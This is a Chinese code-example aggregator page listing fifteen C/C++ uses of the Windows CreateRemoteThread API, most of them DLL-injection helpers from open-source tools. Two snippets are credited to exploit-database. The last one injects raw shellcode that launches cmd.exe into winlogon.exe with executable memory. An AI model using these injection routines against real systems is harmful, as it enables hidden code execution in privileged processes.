当前位置: 首页>>代码示例>>C++>>正文

C++ CreateRemoteThread函数代码示例

本文整理汇总了C++中CreateRemoteThread函数的典型用法代码示例。如果您正苦于以下问题:C++ CreateRemoteThread函数的具体用法?C++ CreateRemoteThread怎么用?C++ CreateRemoteThread使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。


在下文中一共展示了CreateRemoteThread函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。

示例1: InjectDLL

int InjectDLL(char *dll, int ProcessID) {
	HANDLE Proc, RemoteThread;
	LPVOID RemoteStringPtr, LoadLibAddr;
	int writeProcError;

	if(!ProcessID) {
		return 1;
	}
	Proc = OpenProcess(CREATE_THREAD_ACCESS, FALSE, ProcessID);
	if(!Proc) {
		return 2;
	}
	LoadLibAddr = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (LoadLibAddr == NULL) {
		return 3;
	}
	RemoteStringPtr = (LPVOID)VirtualAllocEx(Proc, NULL, strlen(dll), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
	if (RemoteStringPtr == NULL) {
		return 4;
	}
	writeProcError = WriteProcessMemory(Proc, (LPVOID)RemoteStringPtr, dll, strlen(dll), NULL);
	if (writeProcError == 0) {
		return 5;
	}
	RemoteThread = CreateRemoteThread(Proc, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibAddr, (LPVOID)RemoteStringPtr, NULL, NULL);
	if (RemoteThread == NULL) {
		return 6;
	}
	CloseHandle(Proc);
	return 0;
}
开发者ID:rass89rus,项目名称:syringe,代码行数:31,代码来源:syringe.c

示例2: CreateRemoteThread

//-----------------------------------------------------------------------------
// Name: Execute
// Object: execute RemoteProcFuncAddress proc in remote process (blocking call : function will not return until thread as finished)
//         Use this function if you don't have injected code (func already exist in remote process)
//         WARNING A DIRECT CALL WILL WORK ONLY FOR FUNC HAVING 1 PARAMETER AND IF THIS PARAMETER IS A POINTER
//         else you have to do code injection like done in RemoteGetProcAddress, RemoteGetModuleHandleThreadProc
//         RemoteFreeLibrary
// Parameters :
//     in  : FARPROC RemoteProcFunc : remote address of the proc func to execute
//     out : LPDWORD lpExitCode : exit code of TreadProc
//     return : FALSE on error
//-----------------------------------------------------------------------------
BOOL CCodeInject::Execute(FARPROC RemoteProcFuncAddress,LPDWORD lpExitCode)
{
    HANDLE       hThread = NULL; // the handle to the thread executing the remote copy of ThreadProc;
    DWORD        dwThreadId = 0;

    if (IsBadWritePtr(lpExitCode,sizeof(DWORD)))
        return FALSE;

    *lpExitCode=0;

    // Start execution of remote ThreadProc
    hThread = CreateRemoteThread(this->hProcess,
                                NULL,
                                0,
                                (LPTHREAD_START_ROUTINE) RemoteProcFuncAddress,
                                this->pDataRemote,
                                0,
                                &dwThreadId
                                );
    if (!hThread)
        return FALSE;

    // wait for end of thread
    if (WaitForSingleObject(hThread, INFINITE)!=WAIT_OBJECT_0)
    {
        CloseHandle(hThread);
        return FALSE;
    }

    GetExitCodeThread(hThread, lpExitCode);
    CloseHandle(hThread);
    return TRUE;
}
开发者ID:340211173,项目名称:hf-2011,代码行数:45,代码来源:CodeInject.cpp

示例3: RemoteSynchronousCall

// TODO: comment.
BOOL RemoteSynchronousCall(HANDLE process, LPVOID function, LPVOID argument, LPDWORD result) {
  LPTHREAD_START_ROUTINE routine = static_cast<LPTHREAD_START_ROUTINE>(static_cast<LPVOID>(function));
  ScopedHandle thread(CreateRemoteThread(process, NULL, 0, routine, argument, 0, NULL));
  if(thread.handle == NULL) {
    THROW_ERROR("Unable to create a thread in the remote process!");
    return FALSE;
  }

  DWORD event = WaitForSingleObject(thread.handle, INFINITE);
  if(event != WAIT_OBJECT_0) {
    THROW_ERROR("Unable to wait for the thread to finish!");
    return FALSE;
  }

  DWORD exit_code;
  BOOL rv = GetExitCodeThread(thread.handle, &exit_code);
  if(rv == FALSE) {
    THROW_ERROR("Unable to get remote thread's exit code!");
    return FALSE;
  }

  if(!thread.Close()) {
    THROW_ERROR("Unable to close remote thread!");
    return FALSE;
  }

  *result = exit_code;
  return TRUE;
}
开发者ID:xairy,项目名称:packet-sniffer,代码行数:30,代码来源:main.cpp

示例4: main

int main() {
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    CreateProcessW(PROC_NAME, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

    HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
    LPTHREAD_START_ROUTINE pLoadLibraryW =
    	(LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");

    SIZE_T dwLength = (wcslen(DLL_NAME) + 1) * 2;
    LPVOID lpLibName = VirtualAllocEx(pi.hProcess, NULL, dwLength, MEM_COMMIT, PAGE_READWRITE);

    SIZE_T written = 0;
    WriteProcessMemory(pi.hProcess, lpLibName, DLL_NAME, dwLength, &written);

    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, NULL, pLoadLibraryW, lpLibName, NULL, NULL);
    WaitForSingleObject(hThread, INFINITE);

    CloseHandle(hThread);
    ResumeThread(pi.hThread);

    VirtualFreeEx(pi.hProcess, lpLibName, dwLength, MEM_RELEASE);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

    return 0;
}
开发者ID:revsic,项目名称:Code-Injection,代码行数:32,代码来源:InjectDll.cpp

示例5: LoadRemoteDll

bool LoadRemoteDll(DWORD pid, const char* dllPath)
{
	HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

	if (hProc == NULL)
		return false;

	PVOID p = VirtualAllocEx(hProc, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
	DWORD l;
	BOOL r = WriteProcessMemory(hProc, p, dllPath, strlen(dllPath) + 1, &l);

	if (!r) {

		VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);
		return false;
	}

	HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, 
		(LPTHREAD_START_ROUTINE )GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA"), 
		p, 0, &l);

	VirtualFreeEx(hProc, p, strlen(dllPath) + 1, MEM_RELEASE);

	if (hThread == NULL) {

		return false;
	}

	WaitForSingleObject(hThread, INFINITE);
	GetExitCodeThread(hThread, &l);
	CloseHandle(hThread);
	return l != 0;
}
开发者ID:brock7,项目名称:xdbg,代码行数:33,代码来源:launcher.cpp

示例6: Unload

/*
	Unload Dll from process

	RETURN:
		Error code
*/
DWORD CMemDll::Unload()
{
	HANDLE hThread = NULL;
	HMODULE hDll = NULL;

    if(!CMemCore::Instance().m_hProcess)
        return ERROR_INVALID_HANDLE;

	//Search for dll in process
	if((hDll = (HMODULE)GetModuleAddress(GetProcessId(CMemCore::Instance().m_hProcess), TEXT(DLL_NAME))) !=0 )
	{
		hThread = CreateRemoteThread
			(
				CMemCore::Instance().m_hProcess, 
				NULL, 0, 
				(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32.dll"), "FreeLibrary"), 
				(void*)hDll, 
				0, NULL
			);

		if(hThread == NULL)
		{
			MessageBox(NULL, TEXT("Cannot create thread"), TEXT("Error"), MB_ICONERROR);
			return GetLastError();
		}
		//Wait for completion
		WaitForSingleObject(hThread, INFINITE);
		CloseHandle(hThread);
	}

    return ERROR_SUCCESS;
}
开发者ID:hfenigma,项目名称:darkd3,代码行数:38,代码来源:MemDll.cpp

示例7: BaseCreateThreadPoolThread

NTSTATUS
NTAPI
BaseCreateThreadPoolThread(IN PTHREAD_START_ROUTINE Function,
                           IN PVOID Parameter,
                           OUT PHANDLE ThreadHandle)
{
    NTSTATUS Status;

    /* Create a Win32 thread */
    *ThreadHandle = CreateRemoteThread(NtCurrentProcess(),
                                       NULL,
                                       0,
                                       Function,
                                       Parameter,
                                       CREATE_SUSPENDED,
                                       NULL);
    if (!(*ThreadHandle))
    {
        /* Get the status value if we couldn't get a handle */
        Status = NtCurrentTeb()->LastStatusValue;
        if (NT_SUCCESS(Status)) Status = STATUS_UNSUCCESSFUL;
    }
    else
    {
        /* Set success code */
        Status = STATUS_SUCCESS;
    }

    /* All done */
    return Status;
}
开发者ID:amaneureka,项目名称:reactos,代码行数:31,代码来源:dllmain.c

示例8: WinMain

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
	int nArgs;
	LPWSTR* lpszArgs = CommandLineToArgvW(GetCommandLineW(), &nArgs);
	int showHelp = (nArgs < 2);
	int showAttachNotification = 0;
	LPWSTR lpszTargetCmd = NULL;

	int posArg = 0;
	while (++posArg < nArgs) {
		if (!wcscmp(lpszArgs[posArg], L"/?")) {
			showHelp = 1;
			break;
		} else if (!wcscmp(lpszArgs[posArg], L"/M")) {
			showAttachNotification = 1;
		} else {
			size_t cbTargetArgs = strlen(lpCmdLine) * sizeof(wchar_t);
			lpszTargetCmd = (wchar_t*) malloc(cbTargetArgs);
			memset(lpszTargetCmd, 0, cbTargetArgs);
			wchar_t* lpszTargetTemp = lpszTargetCmd;
			size_t nArgLength = 0;
			for (int i = posArg; i < nArgs; i++) {
				nArgLength = wcslen(lpszArgs[i]);
				wcscpy(lpszTargetTemp, lpszArgs[i]);
				if (posArg < nArgs-1) {
					lpszTargetTemp += wcslen(lpszArgs[i]);
					wcscpy(lpszTargetTemp, L" ");
					lpszTargetTemp++;
				}
			}
			break;
		}
	}
	if (showHelp) {
		MessageBox(0, L"ReLocale by kolpazar\n\nUsage: ReLocale [opts] exe [args]\n\nOpts:\n/M Display a message after hooking\n/? Display this window", L"ReLocale", MB_OK);
		return 0;
	}
	if (showAttachNotification) {
		SetEnvironmentVariable(k_lpAttachNotification, L"1");
	}
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	ZeroMemory(&si, sizeof(STARTUPINFO));
	si.cb = sizeof(STARTUPINFO);
	CreateProcess(NULL, lpszTargetCmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED, FALSE, NULL, &si, &pi);
	
	char szHookLibrary[MAX_PATH];
#ifndef _M_AMD64
	strcpy((char*) &szHookLibrary, "ReLocaleHook.dll");
#else
	strcpy((char*) &szHookLibrary, "ReLocaleHook64.dll");
#endif
	LPVOID lpProcessMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(szHookLibrary), MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(pi.hProcess, lpProcessMem, &szHookLibrary, sizeof(szHookLibrary), NULL);

	HANDLE hDllThread = CreateRemoteThread(pi.hProcess, NULL, 0, 
		(LPTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), lpProcessMem, 0, NULL);
	WaitForSingleObject(hDllThread, INFINITE);
	ResumeThread(pi.hThread);
	return 0;
}
开发者ID:kolpazar,项目名称:relocale,代码行数:60,代码来源:main.cpp

示例9: InjectCreateProcess

VOID InjectCreateProcess(PCHAR pName, PCHAR pDllName, PCHAR pCmdArg)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ULONG_PTR dwAddr;
    HANDLE hThread;
    HMODULE hKernel32;
    CHAR CurrentPath[MAX_PATH ];

    if (!GetCurrentDirectory(sizeof(CurrentPath) - 1, CurrentPath)) {
        printf("[-] InjectCreateProcess - GetCurrentDirectory failed : %lu\n", GetLastError());
        return;
    }
    hKernel32 = GetModuleHandleA("kernel32.dll");
    memset(&si, 0, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    memset(&pi, 0, sizeof(PROCESS_INFORMATION));
    if (!CreateProcessA(pName, pCmdArg, NULL, NULL, FALSE, CREATE_SUSPENDED, GetEnvironmentStrings(), CurrentPath, &si, &pi)) {
        printf("[-] InjectCreateProcess - CreateProcessA() failed : %lu\n", GetLastError());
        exit(EXIT_FAILURE);
    }
    dwAddr = (ULONG_PTR)VirtualAllocEx(pi.hProcess, 0, strlen(pDllName) + 1, MEM_COMMIT, PAGE_READWRITE);
    if ((LPVOID)dwAddr == NULL) {
        printf("[-] InjectCreateProcess - VirtualAllocEx failed() : %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 42);
        exit(EXIT_FAILURE);
    }
    WriteProcessMemory(pi.hProcess, (LPVOID)dwAddr, (void*)pDllName, strlen(pDllName) + 1, NULL);
    hThread = CreateRemoteThread(pi.hProcess, NULL, 0,
                                 (LPTHREAD_START_ROUTINE) GetProcAddress(hKernel32,"LoadLibraryA"),
                                 (LPVOID)dwAddr, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
    ResumeThread(pi.hThread);
    CloseHandle(hThread);
}
开发者ID:philicious,项目名称:hacnpx,代码行数:35,代码来源:injector.c

示例10: VirtualAllocEx

bool CUtils::InjectLibraryIntoProcess(HANDLE hProcess, char * szLibPath)
{
	bool bReturn = true;

	size_t sLibraryPathLen = (strlen(szLibPath) + 1);

	void * pRemoteLibraryPath = VirtualAllocEx(hProcess, NULL, sLibraryPathLen, MEM_COMMIT, PAGE_READWRITE);

	SIZE_T sBytesWritten = 0;
	WriteProcessMemory(hProcess, pRemoteLibraryPath, (void *)szLibPath, sLibraryPathLen, &sBytesWritten);

	if(sBytesWritten != sLibraryPathLen) 
	{
		bReturn = false;
	} else {
		HMODULE hKernel32 = GetModuleHandle("Kernel32");
		FARPROC pfnLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
		HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pfnLoadLibraryA, pRemoteLibraryPath, 0, NULL);
		
		if(hThread) 
		{
			WaitForSingleObject(hThread, INFINITE);
			CloseHandle(hThread);
		} else {
			bReturn = false;
		}
	}

	VirtualFreeEx(hProcess, pRemoteLibraryPath, sizeof(pRemoteLibraryPath), MEM_RELEASE);
	return bReturn;
}
开发者ID:LeeHM,项目名称:etmp,代码行数:31,代码来源:Utils.cpp

示例11: InjectDLL

int InjectDLL(HANDLE hProcess, TCHAR *szDllPath)
{
	int szDllPathLen = lstrlen(szDllPath) + 1;

	PWSTR RemoteProcessMemory = (PWSTR)VirtualAllocEx(hProcess, 
		NULL, szDllPathLen, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
	if(RemoteProcessMemory == NULL)
		return -1;
	
	BOOL bRet = WriteProcessMemory(hProcess, 
		RemoteProcessMemory, (PVOID)szDllPath, szDllPathLen, NULL);
	if(bRet == FALSE)
		return -1;
	
	PTHREAD_START_ROUTINE pfnThreadRtn;
	pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress(
		GetModuleHandle("kernel32"), "LoadLibraryA");
	if(pfnThreadRtn == NULL)
		return -1;
	
	HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 
		pfnThreadRtn, RemoteProcessMemory, 0, NULL);
	if(hThread == NULL)
		return -1;

	WaitForSingleObject(hThread, INFINITE);
	
	VirtualFreeEx(hProcess, 
		RemoteProcessMemory, szDllPathLen, MEM_RELEASE);

	CloseHandle(hThread);
	return 0;
}
开发者ID:2016Sun,项目名称:binarybook,代码行数:33,代码来源:injectcode.cpp

示例12: injectDLL

bool injectDLL(HANDLE process, const wchar_t* dllName)
{
	LPVOID loadLibAddress = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryW");
	LPVOID nameAddress = loadStringToMemory(process, dllName);

	if (!nameAddress || !loadLibAddress)
		return false;

	HANDLE creationThread = CreateRemoteThread(process, NULL, NULL,
												static_cast<LPTHREAD_START_ROUTINE>(loadLibAddress),
												nameAddress, NULL, NULL);
	
	if (creationThread)
	{
		WaitForSingleObject(creationThread, INFINITE);
		
		DWORD ret;
		GetExitCodeThread(creationThread, &ret);
		CloseHandle(creationThread);
		
		return (ret != NULL);
	}
	else
		return false;
}
开发者ID:caznova,项目名称:PackerAttacker,代码行数:25,代码来源:main.cpp

示例13: inject

void inject(DWORD pid)
{
	HANDLE phd,h;
	LPVOID shell;
	
	phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
	
	if(phd==INVALID_HANDLE_VALUE)
	{
		printf("\nOpenProcess() Failed."); return ;
	}
	
	shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(shell==NULL)
	{
		printf("\nVirtualAllocEx() Failed");  CloseHandle(phd); return ;
	}
	
	WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0);
	printf("\nInjection successfull\n");
	printf("Running Shellcode......\n");
	
	h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0);
	if(h==NULL)
	{
		printf("Failed to Run Shellcode\n"); return ;
	}
	else
		printf("shellcode Execution Successfull");
}
开发者ID:MeteorAdminz,项目名称:exploit-database,代码行数:30,代码来源:40781.c

示例14: GetModuleHandle

bool DebugFrontend::ExecuteRemoteKernelFuntion(HANDLE process, const char* functionName, LPVOID param, DWORD& exitCode)
{

    HMODULE kernelModule = GetModuleHandle("Kernel32");
    FARPROC function = GetProcAddress(kernelModule, functionName);

    if (function == NULL)
    {
        return false;
    }

    DWORD threadId;
    HANDLE thread = CreateRemoteThread(process, NULL, 0,
        (LPTHREAD_START_ROUTINE)function, param, 0, &threadId);

    if (thread != NULL)
    {
        
        WaitForSingleObject(thread, INFINITE);
        GetExitCodeThread(thread, &exitCode);
        
        CloseHandle(thread);
        return true;

    }
    else
    {
        return false;
    }

}
开发者ID:Halfbrick,项目名称:decoda,代码行数:31,代码来源:DebugFrontend.cpp

示例15: Launch

void Launch()
{
	void* pMem;
	char shellcode[] =
		"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
		"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
		"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
		"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
		"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
		"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
		"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
		"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
		"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
		"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
		"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
		"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
		"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
		"\x65\x78\x65\x00";

	wchar_t* str = L"winlogon.exe";
	DWORD PID = getProcessId(str);
	HANDLE hEx = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
	pMem = VirtualAllocEx(hEx, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	DWORD res = WriteProcessMemory(hEx, pMem, shellcode, sizeof(shellcode), 0);
	HANDLE res2 = CreateRemoteThread(hEx, NULL, 0, (LPTHREAD_START_ROUTINE)pMem, NULL, 0, NULL);
}
开发者ID:0x24bin,项目名称:exploit-database,代码行数:26,代码来源:40039.cpp


注:本文中的CreateRemoteThread函数示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。